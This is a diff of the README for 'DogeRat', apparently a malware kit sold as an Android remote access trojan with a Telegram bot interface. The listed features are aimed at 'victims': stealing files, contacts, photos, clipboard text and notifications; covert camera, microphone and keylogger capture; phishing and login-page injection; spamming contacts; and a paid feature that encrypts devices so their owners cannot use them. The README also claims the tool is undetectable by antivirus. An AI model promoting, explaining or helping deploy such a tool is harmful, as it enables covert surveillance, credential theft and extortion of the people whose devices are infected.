SLTechnicalTips/DogeRat/README.md

 - ✉️ send sms with target device to all of his/her contacts
 - 👤 recive all target contacts
 - 💻 receive list of all installedd apps in target device
-- 📁 receive any file or folder from target device
-- 📁 delete any file or folder from target device
 - 📷 capture main and front camera
 - 🎙 capture microphone (with custom duration)
 - 📋 receive last clipboard text
 - ✅️ auto start after device boot
-- 🔐 Keylogger {Availbe in apk v1 and v2}
+- 🔐 Keylogger
 - ✨ Beautiful telegram bot interface
-- -🤖 Undetectable by antivirus
   ## DOGE RAT PAID VERSION FEATURES
-  🔐 Open any phising page in victim device
+- 🤖 Auto permisson
+- 🔐Encrypt/ Decrypt after encryption victims will be not able to use their devices
 - 🖥️ Screenshot (get screenshot from your victim device)
+- 🗨️ spam message in all contacts after installation which you will set in apk
+- 🔐injection {inject appliactaion automatic with any login or any page unlimited }
+- 🔐 Open any phising page in victim device
+- 🖥️ Screenshot (get screenshot from your victim device)
 - 📒 Gallery puller (Get all photos available in gallery)
 - 🔔 notification reader
 - 🔔 notification sender (send custom notification that apper on target device with custom click link)
 - 🗨️ show toast message on target device (Toasts are messages that appear in a box at the bottom of the device)
 - 🔤 Advance Keylogger
+- 📁 receive any file or folder from target device
+- 📁 delete any file or folder from target device
--  📁 PowerFull file manager {delete and Download Files}
+- 📁 PowerFull file manager
 - ✨ Beautiful telegram bot interface
 - 🤖 Undetectable by antivirus
+- 🤖and more ......
 <br>
 <h2>Requirements</h2>
 <ul>